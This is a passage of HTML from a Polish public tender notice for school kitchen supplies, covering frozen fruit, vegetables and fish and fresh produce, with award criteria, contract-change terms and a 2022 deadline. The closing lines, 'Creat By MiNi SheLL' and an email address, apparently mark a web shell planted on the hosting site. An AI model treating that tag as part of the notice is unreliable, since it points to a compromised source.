ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">miejsce dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.	Część nr 4: owoce i warzywa mrożone, ryby mrożone - warzywa owoce bez uszkodzeń, odpowiednio mrożone; ryby - mrożone odpowiednio całe, zapach smak świeży, po odmrożeniu nie rozpadają się , bez glazury SHP.<br/>Wiśnia drylowana mrożona <br/>Czarna porzeczka mrożona <br/>Truskawka mrożona <br/>Mieszanka kompotowa mrożona<br/>Brokuły mrożone<br/>Bukiet warzyw mrożony<br/>Fasolka szparagowa mrożona cięta<br/>Groszek mrożony <br/>Kalafior mrożony <br/>Mieszanka warz. 7 skł. mrożona <br/>Szpinak brykiet mrożony <br/>Włoszczyzna paski mrożona <br/>Filet z miruny bez skóry 5% glazury<br/>Kostka z mintaja mrożona<br/>Kostka z miruny mrożona<br/>Okoń nilowy filet mrożony 5% glazury<br/>Sola filet mrożony 5% glazury<br/>Filet z Dorsza mrożony 5% glazury<br/>Filet z morszczuka argentyńskiego 5% glazury<br/>- ilości podane w załączniku do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający będzie zamawiał artykuły w miarę potrzeb, a gwarantowana ilość artykułów to 60% artykułów wymienionych w załączniku nr 1 formularzu asortymentowo - cenowym. Pozostałą część zamówienia Zamawiający zrealizuje zgodnie z zapotrzebowaniem. Zmniejszenie ilości zamawianych towarów (do 40% w stosunku do ilości podanych w opisie przedmiotu zamówienia) może mieć miejsce w przypadku zamknięcia kuchni z powodu awarii lub mniejszej ilości uczniów w szkole np. z powodu choroby, wycieczek lub zamknięcia szkoły z przyczyn nieprzewidzianych (np. siły wyższej, w tym pandemii). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">miejsce dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.	Część nr 5: owoce i warzywa świeże - owoce, warzywa, powinny być nie zwiędnięte, skorupka twarda, bez uszkodzeń zewnętrznych. Owoce kulisto-stożkowate (jabłka, pomarańcze, gruszki, śliwki) - intensywny kolor, skóra gładka, tłustawa, lśniąca, miąższ mają zielonkawobiały, soczyste. Warzywa korzenne - korzenie powinny być jędrne, nie popękane, nie sparciałe, bez uszkodzeń spowodowanych przez szkodniki, bez plam. Warzywa klasy pierwszej, nie powinny być zaparzone, zamarznięte, zapleśniałe. Fasola - nasiona suche, nie powinny być zbutwiałe, spleśniałe. Owoce, warzywa liściaste – bez plam, zdrowe, bez uszkodzeń. Ziemniaki-powinny być zdrowe, kształtne, suche, czyste bez ziemi, piasku, nieuszkodzone, jednolitej odmiany, bez oznak zgnilizny i chorób. <br/>Banany klasa I<br/>Burak klasa I<br/>Cebula klasa I<br/>Cukinia<br/>Cytryna klasa I<br/>Czosnek świeży klasa I<br/>Gruszki klasa I<br/>Jabłka (ligol) klasa I<br/>Kalarepa klasa I<br/>Kapusta biała klasa I<br/>Kapusta czerwona klasa I<br/>Kapusta kiszona<br/>Kapusta pekińska klasa I<br/>Kapusta włoska klasa I<br/>Kiwi klasa I kaliber 5-6<br/>Koperek zielony klasa I<br/>Śliwka klasa I<br/>Marchew klasa I<br/>Ogórek kiszony<br/>Ogórek zielony szklarniowy klasa I<br/>Papryka czerwona klasa I<br/>Pieczarki klasa I<br/>Pietruszka (korzeń) klasa I<br/>Pietruszka zielona klasa I<br/>Pomarańcze klasa I<br/>Pomidory malinowe klasa I<br/>Por klasa I<br/>Sałata lodowa klasa I<br/>Seler klasa I<br/>Ziemniaki (lord) klasa I<br/>- ilości podane w załączniku do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający będzie zamawiał artykuły w miarę potrzeb, a gwarantowana ilość artykułów to 60% artykułów wymienionych w załączniku nr 1 formularzu asortymentowo - cenowym. Pozostałą część zamówienia Zamawiający zrealizuje zgodnie z zapotrzebowaniem. Zmniejszenie ilości zamawianych towarów (do 40% w stosunku do ilości podanych w opisie przedmiotu zamówienia) może mieć miejsce w przypadku zamknięcia kuchni z powodu awarii lub mniejszej ilości uczniów w szkole np. z powodu choroby, wycieczek lub zamknięcia szkoły z przyczyn nieprzewidzianych (np. siły wyższej, w tym pandemii). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">miejsce dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony dopuszczają zmiany istotnych postanowień umowy polegające na:<br/>a)	Zmianie terminu lub sposobu realizacji podyktowana wystąpieniem innych okoliczności niezależnych od Stron, których nie dało się przewidzieć przy zachowaniu należytej staranności w momencie zawarcia Umowy. Powyższa zmiana może nastąpić po uprzednim powiadomieniu pisemnym Zamawiającego o proponowanej zmianie i wyrażeniu przez Zamawiającego zgody na taką zmianę;<br/>b)	zmianie powszechnie obowiązujących przepisów prawa mających wpływ na realizację przedmiotu zamówienia, w tym zmiany ustawowe zmiany stawki podatku od towarów i usług (VAT) - zmiana wartości umowy następuje z dniem wejścia w życie zmienionej stawki VAT;<br/>c)	zmniejszeniu ceny określonej w umowie, w przypadku zaistnienia okoliczności wynikających z zasad funkcjonowania rynku powodujących zmniejszenie ceny;<br/>d)	zmianie towaru na towar analogiczny o parametrach nie gorszych od zaoferowanego,<br/>w przypadku zaprzestania produkcji przez dotychczasowego producenta z przyczyn niezależnych od Wykonawcy z zastrzeżeniem, że Wykonawca przedstawi wiarygodne dowody zaprzestania produkcji oraz zaoferuje towar równoważny w cenie zaoferowanej w ofercie albo niższej lub wyższej. W przypadku zaoferowania towaru w cenie innej niż ofertowa dopuszcza się zmianę wynagrodzenia Wykonawcy (tj. zmniejszenie lub zwiększenie) z uwagi na zmianę ceny jednostkowej asortymentu równoważnego;<br/>e)	wprowadzeniu do sprzedaży przez producenta zmodyfikowanego lub udoskonalonego produktu powodującego wycofanie dotychczasowego za cenę nie wyższą niż cena produktu objętego umową;<br/>f)	zmianie numeru katalogowego, nazwy produktu, przy zachowaniu jego parametrów - w przypadku wprowadzenia niniejszych zmian przez producenta potwierdzonych odpowiednimi dokumentami;<br/>g)	zwiększeniu o 10% wartości umowy brutto, o ile stało się to niezbędne dla zapewnienia ciągłości dostawy oraz prawidłowego funkcjonowania stołówki na skutek okoliczności, jakich nie można było przewidzieć na etapie prowadzenia postępowania o zamówienie;<br/>h) wystąpieniu siły wyższej, przez co rozumie się wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub w części (w szczególności klęski żywiołowe, działania wojenne, akty terroryzmu, rewolucję, powstanie, bunt, zamieszki, strajki, kwarantannę, ograniczenia w funkcjonowaniu instytucji publicznych, w tym szkół, a także ograniczenia w przemieszczaniu się lub prowadzeniu działalności gospodarczej wywołane epidemią lub stanem zagrożenia epidemicznego). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-21 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W przypadkach, kiedy w opisie przedmiotu zamówienia wskazane zostały znaki towarowe, patenty, pochodzenie, źródło, lub szczególny proces charakteryzujące określone produkty, Zamawiający dopuszcza zaoferowanie produktów równoważnych.

Creat By MiNi SheLL
Email: jattceo@gmail.com